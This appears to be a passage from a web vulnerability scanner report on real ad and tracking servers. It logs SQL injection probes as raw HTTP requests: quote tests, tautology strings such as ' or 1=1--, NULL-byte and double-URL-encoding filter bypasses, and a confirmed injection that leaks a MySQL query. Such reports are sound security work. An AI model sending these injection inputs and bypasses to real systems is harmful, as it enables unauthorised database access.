Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUlVo69RiZ0jqNPgQ_eE4qd7lFX20AAAtmYASPTEpRhaPmmXNtd4EAAAEvZiQJWw--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:28 GMT; Path=/
Set-Cookie: UA=AAAAAQAUshtdxv8Nep7WiQfS0VXCFGEDCiEDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FMxrIBgPf1fUglQwsIYwgCiwZA5ECACQyB7o-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2985
Date: Mon, 18 Apr 2011 01:05:27 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUCuHqA1IVXQFhIjgDP1QN0ssCPz5nZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MjcxNzg0MTU_LGMsMzIxNjExLHBjLDc2Mjg5LGFjLDE1MTM1NCxvLE4wLVMwLGwsNTM5ODQscGNsaWNrLGh0dHA6Ly9hZC5hZnkxMS5uZXQvYWQ_Yz1QdnpCM3E1NHVVMjJ6N2lKcWdld1RqZ1RENHlKZjdtVVFrZVVGeFo3VWpmOGtWdWllTHpnZTlGalpnT0hmaTVsWENZbkIwYTVXamQxb1VtSUZDUXJjdjNnK0ZNR0w0dVRXSGtPQ2ZLMEExZz0hJjExMjg4MzkyOCcgb3IgMT0xLS0gPTEK&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=27178415?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=2115406896" s
...[SNIP]...

Request 2

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUTv4f.4AvYNPTpLkaenGPTHc02R4AAKsTJuN7gksypS.cOSoSGLwAAAEvZiQOFg--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:29 GMT; Path=/
Set-Cookie: UA=AAAAAQAUq2Z2XwOQwbbOy0ZJvKPLhf0xgaYDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FTwzIBgPf1fUglQwsIYwgCiwpDpECABl8Bzo-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2995
Date: Mon, 18 Apr 2011 01:05:29 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUxMa3f.OWSFo0XK_qzSi0OWqnzqpnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9Mi0tID0xCg--/clkurl=;ord=1734797646?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
'<A HREF="http://ad.amgdgt.com/ads/?t=c&s=AAAAAQAUu1LCr3inDmUp5YA3h7ihYNKcGZlnZW8sdXNhLHQsMTMwMzA4ODcyOTYyMyxjbGt1cmwsaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9qdW1wL041NTMuMTI4Mzg4LkFEQ09OSU9OTUVESUFHUk9VUC9CNTAzOTk5NS4xMDthYnI9IWllNDthYnI9IWllNTtzej0xNjB4NjAwO3BjPVtUUEFTX0lEXTtvcmQ9MTczNDc5NzY0Nj8sYywzMjE2MTEscGMsNzYyODksYWMsMTUxMzU0LG8sTjAtUzAsbCw1Mzk4NCxwY2xpY2ssaHR0cDovL2FkLmFmeTExLm5ldC9hZD9jPVB2ekIzcTU0dVUyMno3aUpxZ2V3VGpnVEQ0eUpmN21VUWtlVUZ4WjdVamY4a1Z1aWVMemdlOUZqWmdPSGZpNWxYQ1luQjBhNVdqZDFvVW1JRkNRcmN2M2crRk1HTDR1VFdIa09DZkswQTFnPSEmMTEyODgzOTI4JyBvciAxPTItLSA9MQo-&j=">\n'+
'<IMG SRC="http://ad.doubleclick.net/ad/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=1734797646?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>\n'+
'</NOSCRIPT>\n'+
'</IFRAME><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=76289&c5=151354&c6=&cv=1.3&cj=1&rn=178
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_cd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_cd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Note that both responses below are 200 OK ad pages and neither excerpt contains an error message; the only visible difference is the body length (12317 bytes against 4098). Ad markup changes between requests regardless of input, so this finding should be treated as unconfirmed until a difference that depends on the injected quote can be reproduced.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16'&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 14:00:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12317

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
L3hzcy1kb3JrLWNyb3NzLXNpdGUtc2NyaXB0aW5nLW1zbndoaXRlcGFnZXNjb20uaHRtbKgDAcgDF-gD3QXoA4oD6APiBegDugL1AwIAAMQ&num=2&sig=AGiWqtyvoRnT7_XBYCMbzl_kBgPSVrAlcA&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16''&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 14:00:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4098

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

1.3. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Note that the bypass claim rests on the same quote/double-quote comparison as the other findings against this host: both responses below are 200 OK ad pages of almost identical length (12507 and 12481 bytes), and neither excerpt shows an error message. Confirm it manually before reporting it as a filter bypass.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00'&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:58:22 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtyi1rn2uRrvPguh1q-agLK2-d5y9A&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00''&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:58:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.4. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Note that both responses below are 200 OK ad pages (12234 and 12603 bytes) and neither excerpt shows an error message. The url value is the page address the ad is served for, and it is echoed into the click-tracking links in the response, so a changed value is expected to change the response regardless of any database; treat this as unconfirmed.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:50:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
4c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWwnqAMByAMX6APdBegDigPoA-IF6AO6AvUDAgAAxA&num=2&sig=AGiWqty8MXeYQZr7hKVhCpbj7a3Uah-E1Q&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:50:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.5. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/evtracker.php

Issue detail

The _evacct parameter is vulnerable to SQL injection. A single quote was submitted in the _evacct parameter, and a database error message was returned; two single quotes were then submitted and the error message disappeared. The error leaks the query itself, select name from client where clientID='1'', which shows the parameter being concatenated into a quoted string literal without escaping, so the vulnerability is confirmed rather than merely suspected.

The database is MySQL (error 1064 with the standard MySQL syntax-error text), behind Apache/2.0.52 and PHP/4.4.2 as advertised in the response headers.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the message alone does not remove the injection; it only turns an error-based finding into a blind one. The value must be kept out of the query text: since clientID is evidently numeric, casting the parameter to an integer before use is the simplest fix, and for string values on the PHP 4 mysql extension mysql_real_escape_string is the available alternative to the bound parameters offered by PDO and mysqli on PHP 5. The Server and X-Powered-By headers should also stop advertising exact versions.

Request 1

GET /evTracker/evtracker.php?_evacct=1'&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
